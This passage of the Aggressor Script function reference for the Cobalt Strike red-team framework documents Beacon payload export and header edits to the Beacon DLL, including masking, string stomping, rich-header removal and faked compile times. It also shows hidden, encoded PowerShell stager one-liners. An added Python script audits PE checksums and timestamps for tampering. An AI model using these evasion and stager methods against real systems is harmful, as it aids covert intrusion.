Functions
This is a list of Aggressor Script’s functions part 4 (3-3).
payload_local
Exports a raw payload for a specific Cobalt Strike listener. Use this function when you plan to spawn this payload from another Beacon session. Cobalt Strike will generate a payload that embeds key function pointers, needed to bootstrap the agent, taken from the parent session’s metadata.
Arguments
$1
- the parent Beacon session ID
$2
- the listener name
$3
- x86|x64 the architecture of the payload
$4
- exit method: ‘thread’ (leave the thread when done) or ‘process’ (exit the process when done). Use ‘thread’ if injecting into an existing process.
Returns
A scalar containing position-independent code for the specified listener.
Example
# $1 = the parent Beacon session ID (e.g., inside an alias)
$data = payload_local($1, "my listener", "x86", "thread");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
pe_insert_rich_header
Insert rich header data into Beacon DLL Content. If there is existing rich header information, it will be replaced.
Arguments
$1
- Beacon DLL content
$2
- Rich header
Returns
Updated DLL Content
Note
The rich header length should be on a 4 byte boundary for subsequent checksum calculations.
Example
# -------------------------------------
# Insert (replace) rich header
# -------------------------------------
$rich_header = "<your rich header info>";
$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);
pe_mask
Mask data in the Beacon DLL Content based on position and length.
Arguments
$1
- Beacon DLL content
$2
- Start location
$3
- Length to mask
$4
- Byte value mask key (int)
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask {
    local('$temp_dll, $start, $length, $maskkey');
    local('%pemap');
    local('@loc_en, @val_en');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    %pemap = pedump($temp_dll);
    @loc_en = values(%pemap, @("Export.Name.<location>"));
    @val_en = values(%pemap, @("Export.Name.<value>"));
    if (size(@val_en) != 1) {
        warn("Unexpected size of export name value array: " . size(@val_en));
    } else {
        warn("Current export value: " . @val_en[0]);
    }
    if (size(@loc_en) != 1) {
        warn("Unexpected size of export location array: " . size(@loc_en));
    } else {
        warn("Current export name location: " . @loc_en[0]);
    }
    # -------------------------------------
    # Set parameters (parse number as base 10)
    # -------------------------------------
    $start = parseNumber(@loc_en[0], 10);
    $length = 4;
    $maskkey = 22;
    # -------------------------------------
    # mask some data in a dll
    # -------------------------------------
    # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
    $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # un-mask (running the same mask a second time should "un-mask")
    # (This would normally be done by the reflective loader)
    # -------------------------------------
    # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
    # $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_mask_section
Mask the named section of the Beacon DLL Content.
Arguments
$1
- Beacon DLL content
$2
- Section name
$3
- Byte value mask key (int)
Returns
Updated DLL Content.
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_section {
    local('$temp_dll, $section_name, $maskkey');
    local('@loc_en, @val_en');
    $temp_dll = $1;
    # -------------------------------------
    # Set parameters
    # -------------------------------------
    $section_name = ".text";
    $maskkey = 23;
    # -------------------------------------
    # mask a section in a dll
    # -------------------------------------
    # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
    $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # un-mask (running the same mask a second time should "un-mask")
    # (This would normally be done by the reflective loader)
    # -------------------------------------
    # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
    # $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_mask_string
Mask a string in the Beacon DLL Content based on position.
Arguments
$1
- Beacon DLL content
$2
- Start location
$3
- Byte value mask key (int)
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_string {
    local('$temp_dll, $location, $length, $maskkey');
    local('%pemap');
    local('@loc');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    %pemap = pedump($temp_dll);
    @loc = values(%pemap, @("Sections.AddressOfName.0.<location>"));
    if (size(@loc) != 1) {
        warn("Unexpected size of section name location array: " . size(@loc));
    } else {
        warn("Current section name location: " . @loc[0]);
    }
    # -------------------------------------
    # Set parameters
    # -------------------------------------
    $location = @loc[0];
    $length = 5;
    $maskkey = 23;
    # -------------------------------------
    # pe_mask_string (mask a string in a dll)
    # -------------------------------------
    # warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
    $temp_dll = pe_mask_string($temp_dll, $location, $maskkey);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # un-mask (running the same mask a second time should "un-mask")
    # we are unmasking the length of the string and the null character
    # (This would normally be done by the reflective loader)
    # -------------------------------------
    # warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey . ")");
    # $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_patch_code
Patch code in the Beacon DLL Content by find/replace within the ‘.text’ section.
Arguments
$1
- Beacon DLL content
$2
- byte array to search for; its position in ‘.text’ becomes the patch offset
$3
- byte array written at the resolved offset (overwrites the existing data)
Returns
Updated DLL Content
Example
sub demo_pe_patch_code {
    local('$temp_dll, $findme, $replacement');
    $temp_dll = $1;
    # ====== simple text values ======
    $findme = "abcABC123";
    $replacement = "123ABCabc";
    # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
    $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
    # ====== byte array as a hex string ======
    $findme = "\x01\x02\x03\xfc\xfe\xff";
    $replacement = "\x01\x02\x03\xfc\xfe\xff";
    # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
    $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_remove_rich_header
Remove the rich header from Beacon DLL Content.
Arguments
$1
- Beacon DLL content
Returns
Updated DLL Content
Example
# -------------------------------------
# Remove/Replace Rich Header
# -------------------------------------
$temp_dll = pe_remove_rich_header($temp_dll);
pe_set_compile_time_with_long
Set the compile time in the Beacon DLL Content.
Arguments
$1
- Beacon DLL content
$2
- Compile Time (as a long in milliseconds)
Returns
Updated DLL Content
Example
# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
$date = 1893521594000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
$date = 1700000001000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
pe_set_compile_time_with_string
Set the compile time in the Beacon DLL Content.
Arguments
$1
- Beacon DLL content
$2
- Compile Time (as a string)
Returns
Updated DLL Content
Example
# ("01 Jan 2020 15:16:17" = "1577913377000")
$strTime = "01 Jan 2020 15:16:17";
$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);
pe_set_export_name
Set the export name in the Beacon DLL Content.
Arguments
$1
- Beacon DLL content
$2
- the export name to set (must already exist in the string table)
Returns
Updated DLL Content
Note
The name must exist in the string table.
Example
# -------------------------------------
# name must be in strings table...
# -------------------------------------
$export_name = "WININET.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);
$export_name = "beacon.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);
pe_set_long
Places a long value at a specified location.
Arguments
$1
- Beacon DLL content
$2
- Location
$3
- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_long {
    local('$temp_dll, $int_offset, $long_value');
    local('%pemap');
    local('@loc_cs, @val_cs');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    %pemap = pedump($temp_dll);
    @loc_cs = values(%pemap, @("CheckSum.<location>"));
    @val_cs = values(%pemap, @("CheckSum.<value>"));
    if (size(@val_cs) != 1) {
        warn("Unexpected size of checksum value array: " . size(@val_cs));
    } else {
        warn("Current checksum value: " . @val_cs[0]);
    }
    if (size(@loc_cs) != 1) {
        warn("Unexpected size of checksum location array: " . size(@loc_cs));
    } else {
        warn("Current checksum location: " . @loc_cs[0]);
    }
    # -------------------------------------
    # Set parameters (parse number as base 10)
    # -------------------------------------
    $int_offset = parseNumber(@loc_cs[0], 10);
    $long_value = 98765;
    # -------------------------------------
    # pe_set_long (set a long value)
    # -------------------------------------
    # warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
    $temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);
    # -------------------------------------
    # Did it work?
    # -------------------------------------
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_set_short
Places a short value at a specified location.
Arguments
$1
- Beacon DLL content
$2
- Location
$3
- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_short {
    local('$temp_dll, $int_offset, $short_value');
    local('%pemap');
    local('@loc, @val');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    %pemap = pedump($temp_dll);
    @loc = values(%pemap, @(".text.NumberOfRelocations.<location>"));
    @val = values(%pemap, @(".text.NumberOfRelocations.<value>"));
    if (size(@val) != 1) {
        warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
    } else {
        warn("Current .text.NumberOfRelocations value: " . @val[0]);
    }
    if (size(@loc) != 1) {
        warn("Unexpected size of .text.NumberOfRelocations location array: " . size(@loc));
    } else {
        warn("Current .text.NumberOfRelocations location: " . @loc[0]);
    }
    # -------------------------------------
    # Set parameters (parse number as base 10)
    # -------------------------------------
    $int_offset = parseNumber(@loc[0], 10);
    $short_value = 128;
    # -------------------------------------
    # pe_set_short (set a short value)
    # -------------------------------------
    # warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
    $temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);
    # -------------------------------------
    # Did it work?
    # -------------------------------------
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_set_string
Places a string value at a specified location.
Arguments
$1
- Beacon DLL content
$2
- Start location
$3
- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_string {
    local('$temp_dll, $location, $value');
    local('%pemap');
    local('@loc_en, @val_en');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    %pemap = pedump($temp_dll);
    @loc_en = values(%pemap, @("Export.Name.<location>"));
    @val_en = values(%pemap, @("Export.Name.<value>"));
    if (size(@val_en) != 1) {
        warn("Unexpected size of export name value array: " . size(@val_en));
    } else {
        warn("Current export value: " . @val_en[0]);
    }
    if (size(@loc_en) != 1) {
        warn("Unexpected size of export location array: " . size(@loc_en));
    } else {
        warn("Current export name location: " . @loc_en[0]);
    }
    # -------------------------------------
    # Set parameters (parse number as base 10)
    # -------------------------------------
    $location = parseNumber(@loc_en[0], 10);
    $value = "BEECON.DLL";
    # -------------------------------------
    # pe_set_string (set a string value)
    # -------------------------------------
    # warn("pe_set_string(dll, " . $location . ", " . $value . ")");
    $temp_dll = pe_set_string($temp_dll, $location, $value);
    # -------------------------------------
    # Did it work?
    # -------------------------------------
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_set_stringz
Places a string value at a specified location and adds a zero terminator.
Arguments
$1
- Beacon DLL content
$2
- Start location
$3
- String to set
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_stringz {
    local('$temp_dll, $offset, $value');
    local('%pemap');
    local('@loc');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    %pemap = pedump($temp_dll);
    @loc = values(%pemap, @("Sections.AddressOfName.0.<location>"));
    if (size(@loc) != 1) {
        warn("Unexpected size of section name location array: " . size(@loc));
    } else {
        warn("Current section name location: " . @loc[0]);
    }
    # -------------------------------------
    # Set parameters (parse number as base 10)
    # -------------------------------------
    $offset = parseNumber(@loc[0], 10);
    $value = "abc";
    # -------------------------------------
    # pe_set_stringz
    # -------------------------------------
    # warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
    $temp_dll = pe_set_stringz($temp_dll, $offset, $value);
    # -------------------------------------
    # Did it work?
    # -------------------------------------
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # Set parameters
    # -------------------------------------
    # $offset = parseNumber(@loc[0], 10);
    # $value = ".tex";
    # -------------------------------------
    # pe_set_string (set a string value)
    # -------------------------------------
    # warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
    # $temp_dll = pe_set_string($temp_dll, $offset, $value);
    # -------------------------------------
    # Did it work?
    # -------------------------------------
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_set_value_at
Sets a long value based on the location resolved by a name from the PE Map (see pedump).
Arguments
$1
- Beacon DLL content
$2
- Name of location field
$3
- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = DLL content
# ===========================================================================
sub demo_pe_set_value_at {
    local('$temp_dll, $name, $long_value, $date');
    local('%pemap');
    local('@loc, @val');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    # %pemap = pedump($temp_dll);
    # @loc = values(%pemap, @("SizeOfImage.<location>"));
    # @val = values(%pemap, @("SizeOfImage.<value>"));
    # if (size(@val) != 1) {
    #     warn("Unexpected size of SizeOfImage value array: " . size(@val));
    # } else {
    #     warn("Current SizeOfImage value: " . @val[0]);
    # }
    # if (size(@loc) != 1) {
    #     warn("Unexpected size of SizeOfImage location array: " . size(@loc));
    # } else {
    #     warn("Current SizeOfImage location: " . @loc[0]);
    # }
    # -------------------------------------
    # Set parameters
    # -------------------------------------
    $name = "SizeOfImage";
    $long_value = 22334455;
    # -------------------------------------
    # pe_set_value_at (set a long value at the location resolved by name)
    # -------------------------------------
    # $1 = DLL (byte array)
    # $2 = name (string)
    # $3 = value (long)
    # -------------------------------------
    warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
    $temp_dll = pe_set_value_at($temp_dll, $name, $long_value);
    # -------------------------------------
    # Did it work?
    # -------------------------------------
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # set it back?
    # -------------------------------------
    # warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
    # $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_stomp
Overwrite a string with null characters. Starting at the specified location, every byte is set to null until the string’s null terminator is reached.
Arguments
$1
- Beacon DLL content
$2
- Start location
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_stomp {
    local('$temp_dll, $location');
    local('%pemap');
    local('@loc, @val');
    $temp_dll = $1;
    # -------------------------------------
    # Inspect the current DLL...
    # -------------------------------------
    %pemap = pedump($temp_dll);
    @loc = values(%pemap, @("Sections.AddressOfName.1.<location>"));
    @val = values(%pemap, @("Sections.AddressOfName.1.<value>"));
    if (size(@val) != 1) {
        warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
    } else {
        warn("Current Sections.AddressOfName.1 value: " . @val[0]);
    }
    if (size(@loc) != 1) {
        warn("Unexpected size of Sections.AddressOfName.1 location array: " . size(@loc));
    } else {
        warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
    }
    # -------------------------------------
    # Set parameters (parse number as base 10)
    # -------------------------------------
    $location = parseNumber(@loc[0], 10);
    # -------------------------------------
    # pe_stomp (stomp a string at a location)
    # -------------------------------------
    # warn("pe_stomp(dll, " . $location . ")");
    $temp_dll = pe_stomp($temp_dll, $location);
    # -------------------------------------
    # Did it work?
    # -------------------------------------
    # dump_my_pe($temp_dll);
    # -------------------------------------
    # All Done! Give back edited DLL!
    # -------------------------------------
    return $temp_dll;
}
pe_update_checksum
Update the checksum in the Beacon DLL Content.
Arguments
$1
- Beacon DLL content
Returns
Updated DLL Content
Note
This should be the last transformation performed.
Example
# -------------------------------------
# update checksum
# -------------------------------------
$temp_dll = pe_update_checksum($temp_dll);
pedump
Parse an executable Beacon into a map of the PE Header information. The parsed information can be used for research or programmatically to make changes to the Beacon.
Arguments
$1
- Beacon DLL content
Returns
A map of the parsed information. The map data is very similar to the “./peclone dump [file]” command output.
Example
# ===========================================================================
# 'case insensitive sort' from sleep manual...
# ===========================================================================
sub caseInsensitiveCompare
{
    $a = lc($1);
    $b = lc($2);
    return $a cmp $b;
}
# ===========================================================================
# Dump PE Information
# $1 = Beacon DLL content
# ===========================================================================
sub dump_my_pe {
    local('$out $key $val %pemap @sorted_keys');
    %pemap = pedump($1);
    # ---------------------------------------------------
    # Example listing all items from hash/map...
    # ---------------------------------------------------
    @sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
    foreach $key (@sorted_keys)
    {
        $out = "$[50]key";
        foreach $val (values(%pemap, @($key)))
        {
            $out .= " $val";
            println($out);
        }
    }
    # ---------------------------------------------------
    # Example of grabbing specific items from hash/map...
    # ---------------------------------------------------
    local('@loc_cs @val_cs');
    @loc_cs = values(%pemap, @("CheckSum.<location>"));
    @val_cs = values(%pemap, @("CheckSum.<value>"));
    println("");
    println("My DLL CheckSum Location: " . @loc_cs);
    println("My DLL CheckSum Value: " . @val_cs);
    println("");
}
See also
./peclone dump [file]
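The three header fields that pe_set_compile_time_with_long, pe_set_compile_time_with_string and pe_update_checksum rewrite, and that pedump reports back, are easy to verify from the outside. The following is an added example, not Aggressor Script or Cobalt Strike code: a standard-library Python parser for the COFF and optional headers, the PE checksum computed the way the linker and imagehlp compute it (a 16-bit one's-complement fold of the file's dwords, skipping the CheckSum field itself, plus the file length), and a small audit that reports the two things a defender looks for after such edits: a CheckSum that no longer matches the image (the Note above says pe_update_checksum must run last for exactly this reason) and a TimeDateStamp that is zero or lies in the future (as the 2030 value in the pe_set_compile_time_with_long example would). It assumes only the PE file format; the header stores seconds since the epoch, whereas pe_set_compile_time_with_long takes milliseconds. The sample image it builds is constructed, headers-only and not loadable.

```python
"""Audit the PE header fields that pedump, pe_set_compile_time_* and pe_update_checksum work on."""
import struct
from datetime import datetime, timezone

IMAGE_DOS_SIGNATURE = 0x5A4D        # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550     # "PE\0\0"
COFF_HEADER_SIZE = 20
CHECKSUM_IN_OPTIONAL = 0x40         # OptionalHeader.CheckSum; same offset for PE32 and PE32+


def _checksum_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum (e_lfanew + signature + COFF header + 0x40)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 + COFF_HEADER_SIZE + CHECKSUM_IN_OPTIONAL


def compute_checksum(data: bytes) -> int:
    """PE checksum as imagehlp/the linker compute it: fold every dword of the file into a
    16-bit one's-complement sum, skipping the CheckSum field itself, then add the file size."""
    skip = _checksum_offset(data) // 4
    padded = data + bytes((-len(data)) % 4)           # pad to a dword boundary
    total = 0
    for i in range(0, len(padded), 4):
        if i // 4 == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)  # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Return the header fields this page's pe_* functions rewrite (imports/exports not parsed)."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if (e_lfanew + 4 + COFF_HEADER_SIZE > len(data)
            or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE):
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + COFF_HEADER_SIZE
    checksum = struct.unpack_from("<I", data, opt + CHECKSUM_IN_OPTIONAL)[0]
    sections = []
    for i in range(nsections):                        # 40-byte section headers, name first
        start = opt + opt_size + 40 * i
        sections.append(data[start:start + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {"machine": machine, "timestamp": timestamp, "checksum": checksum,
            "computed_checksum": compute_checksum(data), "sections": sections}


def write_checksum(data: bytes) -> bytes:
    """Store the computed checksum (what pe_update_checksum does); must be the final edit."""
    out = bytearray(data)
    struct.pack_into("<I", out, _checksum_offset(data), compute_checksum(data))
    return bytes(out)


def audit_pe(data: bytes, now=None) -> dict:
    """Parse and flag the residue of an edited header: a stale CheckSum, an implausible TimeDateStamp."""
    info = parse_pe(data)
    now = now or datetime.now(timezone.utc)
    compiled = datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)
    findings = []
    if info["checksum"] == 0:
        findings.append("CheckSum is zero (never set)")
    elif info["checksum"] != info["computed_checksum"]:
        findings.append("CheckSum does not match the image")
    if info["timestamp"] == 0:
        findings.append("TimeDateStamp is zero")
    elif compiled > now:
        findings.append("TimeDateStamp is in the future")
    info["compiled_utc"] = compiled.isoformat()
    info["findings"] = findings
    return info


def build_sample_pe(timestamp: int, checksum: int = 0) -> bytes:
    """Constructed, headers-only PE32+ image used as sample input (not loadable, not a real DLL)."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: NT headers follow the DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 2, timestamp, 0, 0, 0xF0, 0x2022)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)             # PE32+ magic
    struct.pack_into("<I", opt, CHECKSUM_IN_OPTIONAL, checksum)
    sections = b"".join(n.ljust(8, b"\0") + bytes(32) for n in (b".text", b".rdata"))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections


if __name__ == "__main__":
    clean = write_checksum(build_sample_pe(1577836800))      # 2020-01-01T00:00:00Z
    stomped = write_checksum(build_sample_pe(1893456000))    # 2030-01-01T00:00:00Z
    for label, blob in (("clean", clean), ("timestomped", stomped)):
        report = audit_pe(blob)
        print(label, report["compiled_utc"], hex(report["checksum"]), report["findings"])
```

Because the CheckSum dword is excluded from its own computation, writing the computed value back and recomputing returns the same number, which is why pe_update_checksum can be applied after every other edit; any single changed byte elsewhere in the file changes the computed value, so a stored CheckSum that disagrees with the image is a reliable sign that something was edited after the checksum was last set.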
pgraph
Generate the pivot graph GUI component.
Returns
The pivot graph GUI object (a javax.swing.JComponent)
Example
addVisualization("Pivot Graph", pgraph());
pivots
Returns a list of SOCKS pivots from Cobalt Strike’s data model.
Returns
An array of dictionary objects with information about each pivot.
Example
printAll(pivots());
popup_clear
Remove all popup menus associated with the current menu. This is a way to override Cobalt Strike’s default popup menu definitions.
Arguments
$1
- the popup hook to clear registered menus for
Example
popup_clear("help");
popup help {
    item "My stuff!" {
        show_message("This is my menu!");
    }
}
powershell
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead.
Returns a PowerShell one-liner to bootstrap the specified listener.
Arguments
$1
- the listener name
$2
- [true/false]: is this listener targeting local host?
$3
- x86|x64 - the architecture of the generated stager.
Notes
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A PowerShell one-liner to run the specified listener.
Example
println(powershell("my listener", false));
powershell_command
Returns a one-liner to run a PowerShell expression (e.g., **powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==**).
Arguments
$1
- the PowerShell expression to wrap into a one-liner.
$2
- will the PowerShell command run on a remote target?
Returns
Returns a powershell.exe one-liner to run the specified expression.
Example
$cmd = powershell_command("2 + 2", false);
println($cmd);
powershell_compress
Compresses a PowerShell script and wraps it in a script to decompress and execute it.
Arguments
$1
- the PowerShell script to compress.
Example
$script = powershell_compress("2 + 2");
powershell_encode_oneliner
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use [&powershell_command] instead.
Returns a one-liner to run a PowerShell expression (e.g., **powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==**).
Arguments
$1
- the PowerShell expression to wrap into a one-liner.
Returns
Returns a powershell.exe one-liner to run the specified expression.
Example
$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);
powershell_encode_stager
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use [&artifact_general] and [&powershell_command] instead.
Returns a base64 encoded PowerShell script to run the specified shellcode
Arguments
$1
- shellcode to wrap
Returns
Returns a base64 encoded PowerShell suitable for use with powershell.exe’s -enc option.
Example
$shellcode = shellcode("my listener", false);
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");
pref_get
Grabs a string value from Cobalt Strike’s preferences.
Arguments
$1
- the preference name
$2
- the default value [if there is no value for this preference]
Returns
A string with the preference value.
Example
$foo = pref_get("foo.string", "bar");
pref_get_list
Grabs a list value from Cobalt Strike’s preferences.
Arguments
$1
- the preference name
Returns
An array with the preference values
Example
@foo = pref_get_list("foo.list");
pref_set
Set a value in Cobalt Strike’s preferences
Arguments
$1
- the preference name
$2
- the preference value
Example
pref_set("foo.string", "baz!");
pref_set_list
Stores a list value into Cobalt Strike’s preferences.
Arguments
$1
- the preference name
$2
- an array of values for this preference
Example
pref_set_list("foo.list", @("a", "b", "c"));
previousTab
Activate the tab that is to the left of the current tab.
Example
bind Ctrl+Left {
    previousTab();
}
privmsg
Post a private message to a user in the event log
Arguments
$1
- who to send the message to
$2
- the message
Example
privmsg("raffi", "what's up man?");
prompt_confirm
Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.
Arguments
$1
- text in the dialog
$2
- title of the dialog
$3
- a callback function. Called when the user presses yes.
Example
prompt_confirm("Do you feel lucky?", "Do you?", {
    show_message("Ok, I got nothing");
});
prompt_directory_open
Show a directory open dialog.
Arguments
$1
- title of the dialog
$2
- default value
$3
- true/false: allow user to select multiple folders?
$4
- a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.
Example
prompt_directory_open("Choose a folder", $null, false, {
    show_message("You chose: $1");
});
prompt_file_open
Show a file open dialog.
Arguments
$1
- title of the dialog
$2
- default value
$3
- true/false: allow user to select multiple files?
$4
- a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.
Example
prompt_file_open("Choose a file", $null, false, {
    show_message("You chose: $1");
});
prompt_file_save
Show a file save dialog.
Arguments
$1
- default value
$2
- a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.
Example
prompt_file_save($null, {
    local('$handle');
    $handle = openf("> $+ $1");
    println($handle, "I am content");
    closef($handle);
});
prompt_text
Show a dialog that asks the user for text.
Arguments
$1
- text in the dialog
$2
- default value in the text field.
$3
- a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.
Example
prompt_text("What is your name?", "Cyber Bob", {
    show_message("Hi $1 $+ , nice to meet you!");
});
range
Generate an array of numbers based on a string description of ranges.
Arguments
$1
- a string with a description of ranges
| Range | Result |
|---|---|
| 103 | The number 103 |
| 3-8 | The numbers 3, 4, 5, 6, and 7 |
| 2,4-6 | The numbers 2, 4, and 5 |
Returns
An array of numbers within the specified ranges.
Example
printAll(range("2,4-6"));
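A parser for the range grammar the table above describes, added here as an example; it is not Aggressor Script's own implementation of range. It follows the table literally, so the upper bound of an a-b element is exclusive ("3-8" expands to 3 through 7), and it rejects malformed descriptions instead of returning a partial list.

```python
def parse_range(spec: str) -> list:
    """Expand a range description such as "2,4-6" into a list of ints.

    Mirrors the table: "103" is the single number 103 and "3-8" is
    3, 4, 5, 6, 7 (exclusive upper bound). Whitespace around elements is
    ignored; anything else raises ValueError.
    """
    numbers = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            raise ValueError("empty element in range description %r" % spec)
        if "-" in part:
            lo_text, hi_text = part.split("-", 1)
            lo, hi = int(lo_text), int(hi_text)   # int() raises ValueError on junk
            if hi < lo:
                raise ValueError("descending range %r" % part)
            numbers.extend(range(lo, hi))
        else:
            numbers.append(int(part))
    return numbers


def is_valid_range(spec: str) -> bool:
    """True when parse_range() accepts the description."""
    try:
        parse_range(spec)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for spec in ("103", "3-8", "2,4-6", "8-3"):
        print(spec, "->", parse_range(spec) if is_valid_range(spec) else "invalid")
```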
redactobject
Removes a post-exploitation object (e.g., screenshot, keystroke buffer) from the user interface.
Arguments
$1
- the ID of the post-exploitation object.
removeTab
Close the active tab
Example
bind Ctrl+D {
    removeTab();
}
resetData
Reset Cobalt Strike’s data model
say
Post a public chat message to the event log.
Arguments
$1
- the message
Example
say("Hello World!");
sbrowser
Generate the session browser GUI component. Shows Beacon AND SSH sessions.
Returns
The session browser GUI object (a javax.swing.JComponent)
Example
addVisualization("Session Browser", sbrowser());
screenshots
Returns a list of screenshots from Cobalt Strike’s data model.
Returns
